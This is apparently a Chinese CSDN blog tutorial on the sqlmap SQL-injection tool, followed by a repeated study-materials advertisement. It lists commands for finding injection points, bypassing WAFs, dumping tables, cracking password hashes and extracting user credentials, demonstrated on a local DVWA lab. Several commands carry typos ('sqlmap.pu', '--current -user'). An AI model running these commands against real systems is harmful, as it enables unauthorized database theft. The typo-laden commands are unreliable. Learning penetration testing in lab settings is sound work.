【网络安全 渗透工具】SQLmap精讲(全网最详细图文教程)_sqlmap poc


故POC如下:



python sqlmap.py -u “http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=blp5j1964tfgiov6iusv24m9uj”


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/13c942713489494d889e2c411e8704b3.png)


结果如下:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/47228f9a8da940189d4de35e248f5119.png)


说明存在SQL注入漏洞。




---


#### 2、文件URL、POST


1)检测指定文件中的全部URL是否存在SQL注入漏洞



python sqlmap.py -m 文件名


实例参考该链接:[留言板项目SQLmap渗透实例 | CSDN@秋说](https://bbs.csdn.net/topics/618653875)




---


2)通过POST请求包进行SQL注入(Burp抓包),检测是否含有SQL注入漏洞



python sqlmap.py -r POST请求包

python sqlmap.py -u “http://example.com/login.php” --data “username=1&password=1”(注入点)


实例参考该链接:[留言板项目SQLmap渗透实例 | CSDN@秋说](https://bbs.csdn.net/topics/618653875)




---


3)指定进行检测的数据库类型



python sqlmap.py -u 目标URL -dbms 数据库类型


-D 指定数据库


-T 指定表


-C 指定字段


### 脱库



> 
> 在确定能够使用SQLmap进行注入后,可以进行脱库操作。
> 
> 
> 


#### 1、获取当前数据库版本



python sqlmap.py -u 目标URL -b


实例如下:


POC含有Cookie参数


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/4ae3f0ef7e244aef9d67d6096b4cc283.png)  
 回显如下:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/e480b2da466841a28bb7e110801622aa.png)


* Web应用程序技术:PHP版本为7.3.4,Nginx版本为1.15.11。
* 后端数据库管理系统(DBMS):MySQL版本要求大于等于5.6,实际检测到的版本为5.7.26。


#### 2、获取当前数据库名称



python sqlmap.py -u 目标URL --current-db


实例如下:


POC含有Cookie参数


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/2c09d3c61f5443e988a7ba55d1063cca.png)  
 回显可知当前数据库名称为dvwa:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/e4eb117498cf40c5a67f314717573117.png)


#### 3、列出所有数据库



python sqlmap.py -u 目标URL --dbs


实例如下:


图中的POC含有Cookie参数


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/ac1da0ec22d24039b4372d4954db3c51.png)  
 回显如下,存在两个数据库,一个为dvwa,一个为information\_schema


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/224d7c0aece545b8bf456bdd202ecc40.png)


#### 4、列出指定数据库的所有表



python sqlmap.py -u 目标URL -D 数据库名称 --tables


实例如下:


这里列出dvwa数据库所有的表,POC含有Cookie参数


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/13158e8e7d1647a6bc59ded90d1ef1d5.png)  
 回显如下,两个表,一个为guestbook,一个为users:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/acc96256c00045b18910a19fb268fb4c.png)


#### 5、获取表中所有数据



python sqlmap.py -u 目标URL -D 数据库名称 -T 表名称 --dump


实例如下:


这里列出users所有的数据,POC含有Cookie参数


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/9b5f100f8e5d413cb87b6c634060c170.png)


由于密码经过hash加密,SQLmap会通过不同的加密算法遍历每个字符串,将得到的hash值与数据库中的hash进行匹配:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/5707f4441fb548d8a59436d9d40083a1.png)


如图是使用md5加密后进行匹配得到密码的部分结果:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/01fa996ac88248659087955572364ee2.png)


结果如图:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/af81f7dd6549429287e7f27944167e79.png)


#### 6、搜索库、表、字段



python sqlmap.py -u 目标URL --search


#### 7、绕过WAF



python sqlmap.pu -u 目标URL --tamper


### 账号


#### 1、获取所有数据



python sqlmap.pu -u 目标URL -a


实例如下:


POC包含cookie参数



python sqlmap.py -u “http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=blp5j1964tfgiov6iusv24m9uj” -a


结果如图:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/3da5d55b9c9c447992222a7fbe3d3143.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/83c568a1951f4dc6aa9c2cfffe62a049.png)


#### 2、显示当前用户



python sqlmap.pu -u 目标URL --current -user


实例如下:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/92366c40049e4e2fa5420576819082c6.png)


回显如下,当前用户为admin:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/0e935efc99de4ce5acbfc54e20324de4.png)


#### 3、检测是否为数据库管理员



python sqlmap.pu -u 目标URL --is-dba


实例如下:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/bf9e6b95d44a41518adb3d9b1e1759d2.png)


回显如下:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/58380650be704124ae12c95edfc930cf.png)


当前用户不是管理员


#### 4、获取所有用户



python sqlmap.pu -u 目标URL --users


#### 5、查看当前用户权限



python sqlmap.pu -u 目标URL --privileges


实例如下:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/799df11c12bf4a7d85e9066bfe411bf7.png)  
 回显如下:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/9d1fdd1ead7640bc90ebaf9d4f16128a.png)


当前权限为USAGE


#### 6、获取用户的密码(hash值)



python sqlmap.pu -u 目标URL --passwords


#### 7、获取服务器主机名称



python sqlmap.pu -u 目标URL --hostname


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/a410821de8154ca5b6172c04d30ac4d5.png)


回显如下:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/7d2013a7cc5e4bd18aa9bb64a32ce570.png)


#### 8、显示正在运行的SQL语句



python sqlmap.pu -u 目标URL --statements


#### 9、以盲注方式获取web应用程序的管理员密码:



python sqlmap.py -u 目标URL --technique=T --time-sec 10 --level=3 --risk=3 --current-user --current-db --passwords


### 其它


1)不再询问确认:



python sqlmap.pu -u 目标URL --batch


2)指定请求方式:



python sqlmap.pu -u 目标URL --method=GET


3)随机UA:



python sqlmap.pu -u 目标URL --random-agent


4)自定义UA:



python sqlmap.pu -u 目标URL --user-agent’’


5)自定义referer:

## 最后

**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

![img](https://img-blog.csdnimg.cn/img_convert/c85bfe901ed67c6964c0a2ef81ff7c7b.png)

![img](https://img-blog.csdnimg.cn/img_convert/9a115aa01866823f222ac045f5f9c4f5.png)

![img](https://img-blog.csdnimg.cn/img_convert/32acad7f419f9e3e60085ccd07deb92a.png)

![img](https://img-blog.csdnimg.cn/img_convert/f341859c8793dc568048b498f5ed3791.png)

![img](https://img-blog.csdnimg.cn/img_convert/503651dd8ce10d7bba3f4cac9df24d50.png)

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

从何学起的朋友。**

[外链图片转存中...(img-kvbvvjMa-1715572791200)]

[外链图片转存中...(img-7kZ9DyWb-1715572791201)]

[外链图片转存中...(img-5qjo5bj3-1715572791201)]

[外链图片转存中...(img-JT7s2pS2-1715572791201)]

[外链图片转存中...(img-6Qh1MFIx-1715572791202)]

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值